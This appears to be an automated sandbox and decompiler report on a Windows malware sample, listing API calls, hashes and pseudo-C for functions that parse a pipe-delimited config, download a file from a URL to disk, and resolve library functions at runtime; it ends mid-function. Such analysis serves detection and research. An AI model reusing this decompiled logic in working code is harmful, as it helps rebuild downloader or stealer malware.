String ID: image/jpeg$g@A$g@A
API String ID: 0-1537867833
Opcode ID: 13642a03564dce3ec8fa5213b0d982587bde0afc6153abd95ccba73b638ac59e
Instruction ID: 94b623c1a3e4286d278b3a98d93620b6c1d28f1eb204197fa047bb13e3fbbd8a
Opcode Fuzzy Hash: 13642a03564dce3ec8fa5213b0d982587bde0afc6153abd95ccba73b638ac59e
Instruction Fuzzy Hash: 3251FAB5A11208AFCB04DBE4DC44FEEB7B9EF4C701F148929F605E6290D734A951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 02D28530, Relevance: 19.7, APIs: 13, Instructions: 155stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D2855F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D285AF
RtlAllocateHeap.NTDLL(00000000), ref: 02D285B6
lstrcat.KERNEL32(?,0041A208), ref: 02D28631

Part of subcall function 02D27480: memset.MSVCRT ref: 02D274D2
Part of subcall function 02D27480: LocalAlloc.KERNEL32(00000040,?), ref: 02D27521
Part of subcall function 02D27480: lstrcat.KERNEL32(?,00000000), ref: 02D27587

lstrcat.KERNEL32(?,00000000), ref: 02D28675
lstrcat.KERNEL32(?,0041A488), ref: 02D28688
lstrcat.KERNEL32(?,?), ref: 02D2869C
lstrcat.KERNEL32(?,0041A158), ref: 02D286B0
lstrcat.KERNEL32(?,?), ref: 02D286C4
lstrcat.KERNEL32(?,004191F0), ref: 02D286D6
lstrcat.KERNEL32(?,?), ref: 02D286EA
lstrcat.KERNEL32(?,00418BC0), ref: 02D286FC
lstrlen.KERNEL32(?), ref: 02D2870E

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocAllocateLocalProcesslstrlenmemsetwsprintf
String ID:
API String ID: 2806430148-0
Opcode ID: 88c21c9bfdff89063fd4b0833be0942f936582d795599a721e22ff83f338ee38
Instruction ID: b956cb2595a3556ce1a1616b680175b9b30525c178846090c5faadb7f8e11606
Opcode Fuzzy Hash: 88c21c9bfdff89063fd4b0833be0942f936582d795599a721e22ff83f338ee38
Instruction Fuzzy Hash: 5A5150B1A00118ABCB14DBA4DD4AFDA77B8AF4C705F008594F709D3251DA35EEA1CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 004082E0, Relevance: 19.7, APIs: 13, Instructions: 155stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040830F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040835F
RtlAllocateHeap.NTDLL(00000000), ref: 00408366
lstrcat.KERNEL32(?,02E4A2D0), ref: 004083E1

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00000000), ref: 00408425
lstrcat.KERNEL32(?,02E4A378), ref: 00408438
lstrcat.KERNEL32(?,?), ref: 0040844C
lstrcat.KERNEL32(?,02E4AFC0), ref: 00408460
lstrcat.KERNEL32(?,?), ref: 00408474
lstrcat.KERNEL32(?,004191F0), ref: 00408486
lstrcat.KERNEL32(?,?), ref: 0040849A
lstrcat.KERNEL32(?,00418BC0), ref: 004084AC
lstrlen.KERNEL32(?), ref: 004084BE

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocAllocateLocalProcesslstrlenmemsetwsprintf
String ID:
API String ID: 2806430148-0
Opcode ID: 625843ca34ed7e0e1c7bac87bae398836e1447a572bc5b4c7a4beef6269fe3f9
Instruction ID: 59f89f9cc7d9a5e3f1725e4a0dc26015c1addf92b97e6f17d5df6be883cb31b8
Opcode Fuzzy Hash: 625843ca34ed7e0e1c7bac87bae398836e1447a572bc5b4c7a4beef6269fe3f9
Instruction Fuzzy Hash: 885168B1A00108ABCB14DFA4DD4AEDA77B8AF4C705F0085A4F709D3251DA35DEA1CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D24C30, Relevance: 19.6, APIs: 13, Instructions: 141networkfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 02D24C5E
StrCmpCA.SHLWAPI(00000000,00418B84), ref: 02D24C8A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 02D24CDF
HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 02D24D1F
StrCmpCA.SHLWAPI(?,00418B8C), ref: 02D24D35
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02D24D67
InternetReadFile.WININET(?,?,00000400,?), ref: 02D24D90
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D24DBE
CloseHandle.KERNEL32(?,?,00000400), ref: 02D24E0C
InternetCloseHandle.WININET(?), ref: 02D24E16
InternetCloseHandle.WININET(00000000), ref: 02D24E23

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CreateHttpInfoQueryReadWrite
String ID:
API String ID: 1681390745-0
Opcode ID: cee54dde57788165cd2f5eecb82456abf25827b5851e07fa58a387223f456198
Instruction ID: d2a68f8a32b9935a33d36286767cfdda090b158acad375e3082a4aede3169b2f
Opcode Fuzzy Hash: cee54dde57788165cd2f5eecb82456abf25827b5851e07fa58a387223f456198
Instruction Fuzzy Hash: F55152B1A41228ABDB20CF50DC45FEE77B8FF58709F108499F605A62C0D7749A88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406320, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 185
stringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00406320(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v5548;
				char* _v5552;
				char _v5820;
				char* _v5824;
				char _v5828;
				char _v5832;
				signed int _v5836;
				char* _t74;
				intOrPtr _t79;
				void* _t99;
				void* _t100;

				E004139B0(0x16c8, __ecx);
				_v5552 = 1;
				E0040B720( &_v5548, 0x1388);
				E0040B720( &_v540, 0x104);
				E0040B720( &_v5820, 0x104);
				E0040B720( &_v276, 0x104);
				E0040B720( &_v5832, 4);
				 *0x41aa24( &_v5548, _a4);
				_t74 = E0040C090( &_v5548, "|",  &_v5828);
				_t100 = _t99 + 0xc;
				_v5824 = _t74;
				_v8 = 1;
				while(_v5824 != 0) {
					_v5836 = _v8;
					_v5836 = _v5836 - 1;
					if(_v5836 <= 6) {
						switch( *((intOrPtr*)(_v5836 * 4 +  &M0040662C))) {
							case 0:
								if(_v5552 == 0) {
									E0040B720( &_v540, 0x104);
									_push(_v5824);
									_push( &_v540);
									 *0x41aa24();
								} else {
									_push("1");
									_push(_v5824);
									if( *0x41aa4c() == 0) {
										 *0x41aba4 = 1;
									}
								}
								goto L37;
							case 1:
								__eflags = _v5552;
								if(_v5552 == 0) {
									_v544 = E0040B650(__ecx, _v5824);
								} else {
									_push("1");
									__ecx = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41aba8 = 1;
									}
								}
								goto L37;
							case 2:
								__eflags = _v5552;
								if(_v5552 == 0) {
									__ecx =  &_v5820;
									__eax = E0040B720( &_v5820, 0x104);
									_push(_v5824);
									__eax =  &_v5820;
									_push( &_v5820);
									__eax =  *0x41aa24();
								} else {
									_push("1");
									__eax = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41abac = 1;
									}
								}
								goto L37;
							case 3:
								__eflags = _v5552;
								if(_v5552 == 0) {
									E0040B720( &_v276, 0x104) = _v5824;
									_push(_v5824);
									__ecx =  &_v276;
									_push( &_v276);
									__eax =  *0x41aa24();
								} else {
									_push("1");
									__ecx = _v5824;
									_push(_v5824);
									__eax =  *0x41aa4c();
									__eflags = __eax;
									if(__eax == 0) {
										 *0x41abb0 = 1;
									}
									_v5552 = 0;
									_v8 = 0;
								}
								goto L37;
							case 4:
								_push("0");
								_push(_v5824);
								__eax =  *0x41aa4c();
								__eflags = __eax;
								if(__eax != 0) {
									_v12 = 1;
								} else {
									_v12 = 0;
								}
								goto L37;
							case 5:
								_push("0");
								__eax = _v5824;
								_push(_v5824);
								__eax =  *0x41aa4c();
								__eflags = __eax;
								if(__eax != 0) {
									_v5832 = 1;
								} else {
									_v5832 = 0;
								}
								goto L37;
							case 6:
								__ecx = _v5824;
								_t51 =  &_a8; // 0x406751
								__eax =  *_t51;
								__ecx = _v12;
								__eax =  &_v5820;
								__ecx = _v544;
								__eax = E00406130(_v544, __eflags,  &_v540, _v544,  &_v5820,  &_v276, _v12,  *_t51, _v5832, _v5824);
								_v8 = 0;
								goto L37;
						}
					}
					L37:
					_v8 = _v8 + 1;
					_t79 = E0040C090(0, "|",  &_v5828);
					_t100 = _t100 + 0xc;
					_v5824 = _t79;
				}
				return E0040B720( &_v5548, 0x1388);
			}

0x00406328
0x0040632d
0x00406343
0x00406354
0x00406365
0x00406376
0x00406384
0x00406394
0x004063ad
0x004063b2
0x004063b5
0x004063bb
0x004063c2
0x004063d2
0x004063e1
0x004063ee
0x004063fa
0x00000000
0x00406408
0x00406438
0x00406443
0x0040644a
0x0040644b
0x0040640a
0x0040640a
0x00406415
0x0040641e
0x00406420
0x00406420
0x0040642a
0x00000000
0x00000000
0x00406456
0x0040645d
0x00406490
0x0040645f
0x0040645f
0x00406464
0x0040646a
0x0040646b
0x00406471
0x00406473
0x00406475
0x00406475
0x0040647f
0x00000000
0x00000000
0x0040649b
0x004064a2
0x004064cb
0x004064d2
0x004064dd
0x004064de
0x004064e4
0x004064e5
0x004064a4
0x004064a4
0x004064a9
0x004064af
0x004064b0
0x004064b6
0x004064b8
0x004064ba
0x004064ba
0x004064c4
0x00000000
0x00000000
0x004064f0
0x004064f7
0x0040653d
0x00406543
0x00406544
0x0040654a
0x0040654b
0x004064f9
0x004064f9
0x004064fe
0x00406504
0x00406505
0x0040650b
0x0040650d
0x0040650f
0x0040650f
0x00406519
0x00406523
0x00406523
0x00000000
0x00000000
0x00406556
0x00406561
0x00406562
0x00406568
0x0040656a
0x00406575
0x0040656c
0x0040656c
0x0040656c
0x00000000
0x00000000
0x0040657e
0x00406583
0x00406589
0x0040658a
0x00406590
0x00406592
0x004065a0
0x00406594
0x00406594
0x00406594
0x00000000
0x00000000
0x004065ac
0x004065ba
0x004065ba
0x004065be
0x004065c9
0x004065d0
0x004065de
0x004065e6
0x00000000
0x00000000
0x004063fa
0x004065ed
0x004065f3
0x00406604
0x00406609
0x0040660c
0x0040660c
0x0040662b

APIs

lstrcat.KERNEL32(?,?), ref: 00406394
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 00406416
lstrcat.KERNEL32(?,00000000), ref: 0040644B
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 0040646B
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 004064B0
lstrcat.KERNEL32(?,00000000), ref: 004064E5
StrCmpCA.SHLWAPI(00000000,00418BDC), ref: 00406505
lstrcat.KERNEL32(?,00000000), ref: 0040654B
StrCmpCA.SHLWAPI(00000000,00418BE0), ref: 00406562
StrCmpCA.SHLWAPI(00000000,00418BE0), ref: 0040658A

Part of subcall function 00406130: wsprintfA.USER32 ref: 0040616C
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 004061BC
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 004061EA
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 00406218
Part of subcall function 00406130: lstrcpy.KERNEL32(?,00000000), ref: 00406246

Strings

Qg@, xrefs: 004065BA, 004065BD

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcatlstrcpy$wsprintf
String ID: Qg@
API String ID: 2209684894-3462340965
Opcode ID: 315f55e7bfbd4beb232a1c8891c28293502b42785fb1e119d37202c3e2330f60
Instruction ID: a6c453932f1a9cbb60a7cc7ac58ece15fec1271fc19e7cecd9f856b6af5d47a2
Opcode Fuzzy Hash: 315f55e7bfbd4beb232a1c8891c28293502b42785fb1e119d37202c3e2330f60
Instruction Fuzzy Hash: CB7160B5904218EBCB24DF50DC85BEA73B8AF44304F0482EEE10AA7290D7799BD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D27B50, Relevance: 18.1, APIs: 12, Instructions: 105libraryloaderstringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0041A034,0041B488,0000FFFF), ref: 02D27B7E
lstrcat.KERNEL32(?,0041B488), ref: 02D27BAD
lstrcat.KERNEL32(?,004191E8), ref: 02D27BBF
lstrcat.KERNEL32(?,00000000), ref: 02D27BD0
SetEnvironmentVariableA.KERNEL32(0041A034,?), ref: 02D27BE4
LoadLibraryA.KERNEL32(0041A6CC), ref: 02D27C02
GetProcAddress.KERNEL32(0041A824,0041A2B0), ref: 02D27C27
GetProcAddress.KERNEL32(0041A824,0041A628), ref: 02D27C40
GetProcAddress.KERNEL32(0041A824,0041A1B4), ref: 02D27C58
GetProcAddress.KERNEL32(0041A824,0041A12C), ref: 02D27C70
GetProcAddress.KERNEL32(0041A824,0041A7B4), ref: 02D27C89
GetProcAddress.KERNEL32(0041A824,0041A358), ref: 02D27CA1

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AddressProc$lstrcat$EnvironmentVariable$LibraryLoad
String ID:
API String ID: 570708976-0
Opcode ID: 5d1afafd0d255a9686fd40642ef553bfe1b9492984f50bbc3a87acd3736cfc51
Instruction ID: fc08720c893498d0850b0fba460e7a66a98166ebb3e67403d853e00276572b34
Opcode Fuzzy Hash: 5d1afafd0d255a9686fd40642ef553bfe1b9492984f50bbc3a87acd3736cfc51
Instruction Fuzzy Hash: 91413EB5512200DFE724EFA8ED48AE577F8F708349F04C57AF10582260C77999A6CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407900, Relevance: 18.1, APIs: 12, Instructions: 105
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00407900(void* __ecx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				char _v5012;
				intOrPtr _v5016;
				CHAR* _t17;
				struct HINSTANCE__* _t21;
				CHAR* _t24;
				struct HINSTANCE__* _t26;
				CHAR* _t29;
				CHAR* _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				CHAR* _t45;
				struct HINSTANCE__* _t46;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				CHAR* _t51;
				struct HINSTANCE__* _t52;
				CHAR* _t55;

				E004139B0(0x1394, __ecx);
				if(_a4 == 0) {
					return 0;
				}
				_v8 = 0xffff;
				_t17 =  *0x41a034; // 0x2e49b38
				_v12 = GetEnvironmentVariableA(_t17, 0x41b488, 0xffff);
				if(0x41b488 != 0) {
					E0040B720( &_v5012, 0x1388);
					 *0x41aa24( &_v5012, 0x41b488);
					 *0x41aa24( &_v5012, ";");
					 *0x41aa24( &_v5012, _a4);
					_t55 =  *0x41a034; // 0x2e49b38
					SetEnvironmentVariableA(_t55,  &_v5012);
					E0040B720( &_v5012, 0x1388);
				}
				_t42 =  *0x41a6cc; // 0x2e332e8
				 *0x41a824 = LoadLibraryA(_t42);
				if( *0x41a824 != 0) {
					_t49 =  *0x41a2b0; // 0x2e4a3d8
					_t21 =  *0x41a824; // 0x0
					 *0x41a81c = GetProcAddress(_t21, _t49);
					_t43 =  *0x41a628; // 0x2e4a3f0
					_t50 =  *0x41a824; // 0x0
					 *0x41a840 = GetProcAddress(_t50, _t43);
					_t24 =  *0x41a1b4; // 0x2e4aea0
					_t44 =  *0x41a824; // 0x0
					 *0x41a7ec = GetProcAddress(_t44, _t24);
					_t51 =  *0x41a12c; // 0x2e4a2a0
					_t26 =  *0x41a824; // 0x0
					 *0x41a814 = GetProcAddress(_t26, _t51);
					_t45 =  *0x41a7b4; // 0x2e4b020
					_t52 =  *0x41a824; // 0x0
					 *0x41a828 = GetProcAddress(_t52, _t45);
					_t29 =  *0x41a358; // 0x2e4a438
					_t46 =  *0x41a824; // 0x0
					 *0x41a80c = GetProcAddress(_t46, _t29);
				}
				if( *0x41a81c == 0 ||  *0x41a840 == 0 ||  *0x41a7ec == 0 ||  *0x41a828 == 0 ||  *0x41a80c == 0 ||  *0x41a814 == 0) {
					_v5016 = 0;
				} else {
					_v5016 = 1;
				}
				return _v5016;
			}

0x00407908
0x00407911
0x00000000
0x00407ab0
0x00407917
0x00407928
0x00407934
0x0040793e
0x0040794c
0x0040795d
0x0040796f
0x00407980
0x0040798d
0x00407994
0x004079a6
0x004079a6
0x004079ab
0x004079b8
0x004079c4
0x004079ca
0x004079d1
0x004079dd
0x004079e2
0x004079e9
0x004079f6
0x004079fb
0x00407a01
0x00407a0e
0x00407a13
0x00407a1a
0x00407a26
0x00407a2b
0x00407a32
0x00407a3f
0x00407a44
0x00407a4a
0x00407a57
0x00407a57
0x00407a63
0x00407a9e
0x00407a92
0x00407a92
0x00407a92
0x00000000

APIs

GetEnvironmentVariableA.KERNEL32(02E49B38,0041B488,0000FFFF), ref: 0040792E
lstrcat.KERNEL32(?,0041B488), ref: 0040795D
lstrcat.KERNEL32(?,004191E8), ref: 0040796F
lstrcat.KERNEL32(?,00000000), ref: 00407980
SetEnvironmentVariableA.KERNEL32(02E49B38,?), ref: 00407994
LoadLibraryA.KERNEL32(02E332E8), ref: 004079B2
GetProcAddress.KERNEL32(00000000,02E4A3D8), ref: 004079D7
GetProcAddress.KERNEL32(00000000,02E4A3F0), ref: 004079F0
GetProcAddress.KERNEL32(00000000,02E4AEA0), ref: 00407A08
GetProcAddress.KERNEL32(00000000,02E4A2A0), ref: 00407A20
GetProcAddress.KERNEL32(00000000,02E4B020), ref: 00407A39
GetProcAddress.KERNEL32(00000000,02E4A438), ref: 00407A51

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AddressProc$lstrcat$EnvironmentVariable$LibraryLoad
String ID:
API String ID: 570708976-0
Opcode ID: 7abf122d6e215ba9c63e42e8549cfde015a8d6489de665f1db2b59e3b6550401
Instruction ID: 77b6c5c08cf9b7a4301e695bc4720b41c2074284124323e2e0bb79b02c60fe80
Opcode Fuzzy Hash: 7abf122d6e215ba9c63e42e8549cfde015a8d6489de665f1db2b59e3b6550401
Instruction Fuzzy Hash: FD4120B5616200DFC714EFA4ED48AEA37F4A708305F14C57AF105926A1C77C96A2CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 02D31970, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 02D3197E
GetFileSize.KERNEL32(00000000,00000000), ref: 02D31A41
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D31A5E
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 02D31A74
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 02D31A84
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 02D31A9A
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 02D31AC3

Strings

(, xrefs: 02D31A4A
PE, xrefs: 02D31AFA

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction ID: 5d0435ccf3a0be95095214bc9bdf34134cc4bc11554609b3da3edc1d42a69007
Opcode Fuzzy Hash: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction Fuzzy Hash: 288119B1D10209AFDB19CFD8D885BEEBBB5FB88305F148459E519AB384D730DA81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00411720, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 198
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411720(void* _a4, signed int* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int* _a20) {
				int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				struct _BY_HANDLE_FILE_INFORMATION _v72;
				long _v76;
				void _v80;
				void _v84;
				void _v88;
				signed short _v92;
				signed short _v96;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr* _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t177;

				_v8 = GetFileInformationByHandle(_a4,  &_v72);
				if(_v8 == 0) {
					return 0x200;
				}
				_v16 = _v72.dwFileAttributes;
				_v12 = 0;
				if((_v16 & 0x00000001) != 0) {
					_v12 = _v12 | 0x00000001;
				}
				if((_v16 & 0x00000002) != 0) {
					_v12 = _v12 | 0x00000002;
				}
				if((_v16 & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000004;
				}
				if((_v16 & 0x00000010) != 0) {
					_v12 = _v12 | 0x00000010;
				}
				if((_v16 & 0x00000020) != 0) {
					_v12 = _v12 | 0x00000020;
				}
				if((_v16 & 0x00000010) == 0) {
					_v12 = _v12 | 0x80000000;
				} else {
					_v12 = _v12 | 0x40000000;
				}
				_v12 = _v12 | 0x01000000;
				if((_v16 & 0x00000001) == 0) {
					_v12 = _v12 | 0x00800000;
				}
				_v76 = GetFileSize(_a4, 0);
				if(_v76 > 0x28) {
					SetFilePointer(_a4, 0, 0, 0);
					ReadFile(_a4,  &_v80, 2,  &_v20, 0);
					SetFilePointer(_a4, 0x24, 0, 0);
					ReadFile(_a4,  &_v84, 4,  &_v20, 0);
					if((_v80 & 0x0000ffff) == 0x54ad && _v76 > _v84 + 0x34) {
						SetFilePointer(_a4, _v84, 0, 0);
						ReadFile(_a4,  &_v88, 4,  &_v20, 0);
						if(_v88 == 0x5a4d || _v88 == 0x454e || _v88 == 0x454c || _v88 == 0x4550) {
							_v12 = _v12 | 0x00400000;
						}
					}
				}
				if(_a8 != 0) {
					 *_a8 = _v12;
				}
				if(_a12 != 0) {
					 *_a12 = _v76;
				}
				if(_a16 != 0) {
					_t161 = _v72.ftLastAccessTime;
					_t103 = E00411630(_t161, _v56);
					_t138 = _a16;
					 *_t138 = _t103;
					 *((intOrPtr*)(_t138 + 4)) = _t161;
					_t162 = _v48;
					_t105 = E00411630(_v72.ftLastWriteTime, _t162);
					_t139 = _a16;
					 *((intOrPtr*)(_t139 + 8)) = _t105;
					 *((intOrPtr*)(_t139 + 0xc)) = _t162;
					_t163 = _v64;
					_t107 = E00411630(_v72.ftCreationTime, _t163);
					_t177 = _t177 + 0x18;
					_t140 = _a16;
					 *((intOrPtr*)(_t140 + 0x10)) = _t107;
					 *((intOrPtr*)(_t140 + 0x14)) = _t163;
				}
				if(_a20 != 0) {
					E00411670(_v72.ftLastWriteTime, _v48,  &_v96,  &_v92);
					 *_a20 = _v92 & 0x0000ffff | (_v96 & 0x0000ffff) << 0x00000010;
				}
				return 0;
			}

0x00411734
0x0041173b
0x00000000
0x0041173d
0x0041174a
0x0041174d
0x0041175a
0x00411762
0x00411762
0x0041176b
0x00411773
0x00411773
0x0041177c
0x00411784
0x00411784
0x0041178d
0x00411795
0x00411795
0x0041179e
0x004117a6
0x004117a6
0x004117af
0x004117c7
0x004117b1
0x004117ba
0x004117ba
0x004117d3
0x004117dc
0x004117e8
0x004117e8
0x004117f7
0x004117fe
0x0041180e
0x00411824
0x00411834
0x0041184a
0x0041185a
0x00411873
0x00411889
0x00411896
0x004118bc
0x004118bc
0x00411896
0x0041185a
0x004118c3
0x004118cb
0x004118cb
0x004118d1
0x004118d9
0x004118d9
0x004118df
0x004118e5
0x004118e9
0x004118f1
0x004118f4
0x004118f6
0x004118f9
0x00411901
0x00411909
0x0041190c
0x0041190f
0x00411912
0x0041191a
0x0041191f
0x00411922
0x00411925
0x00411928
0x00411928
0x0041192f
0x00411941
0x00411959
0x00411959
0x00000000

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 0041172E
GetFileSize.KERNEL32(00000000,00000000), ref: 004117F1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041180E
ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 00411824
SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 00411834
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041184A
SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00411873

Strings

PE, xrefs: 004118AA
(, xrefs: 004117FA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: File$Pointer$Read$HandleInformationSize
String ID: ($PE
API String ID: 4143101051-3347799738
Opcode ID: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction ID: e3637cdcc6502234263c20fa9ec7c337361675902c7ba39fe6a18ec050177dc1
Opcode Fuzzy Hash: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction Fuzzy Hash: 7C814AB5D10208ABEB04DFD4C885BEEBBB5FB48300F14C15AE615AB394D3349A81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 02D25D50, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 178stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00000000), ref: 02D25E0A
lstrcat.KERNEL32(?,00000000), ref: 02D25E23

Part of subcall function 02D2C1A0: SHGetFolderPathA.SHELL32(00000000,02D25E30,00000000,00000000,?,?,000003E8), ref: 02D2C1CB

Part of subcall function 02D2C100: StrStrA.SHLWAPI(0041A574,?,?,02D25E47,?,0041A574,00000000), ref: 02D2C10E

lstrcpy.KERNEL32(?,00000000), ref: 02D25E52

Part of subcall function 02D2C100: lstrcpyn.KERNEL32(0041AC88,0041A574,0041A574,?,02D25E47,?,0041A574), ref: 02D2C132
Part of subcall function 02D2C100: wsprintfA.USER32 ref: 02D2C18B

lstrcpy.KERNEL32(?,00000000), ref: 02D25E81
lstrcpy.KERNEL32(?,00000000), ref: 02D25EB0
lstrcpy.KERNEL32(?,00000000), ref: 02D25EDF

Strings

<, xrefs: 02D25F24

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcpy$lstrcat$FolderPathlstrcpynwsprintf
String ID: <
API String ID: 2415926151-4251816714
Opcode ID: ca99b8c5f2615107a35df7a1f1dccff14a2e5a2c5a6f3dec0d12ea2a79c58206
Instruction ID: 68d3cd654a95dba273878889a9d1b77714c5ce0e04268d6d768d4dfe6cd2df8c
Opcode Fuzzy Hash: ca99b8c5f2615107a35df7a1f1dccff14a2e5a2c5a6f3dec0d12ea2a79c58206
Instruction Fuzzy Hash: 546153F1D00228ABDB15DB60DC85FDE7379AB68308F4045DAE20966250DB759F8CCFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405B00, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00405B00(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char* _v1116;
				char* _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				char _v1136;
				intOrPtr _v1140;
				char _t56;
				char _t66;
				void* _t69;
				void* _t73;
				void* _t77;
				void* _t81;
				void* _t83;
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				void* _t126;
				void* _t127;

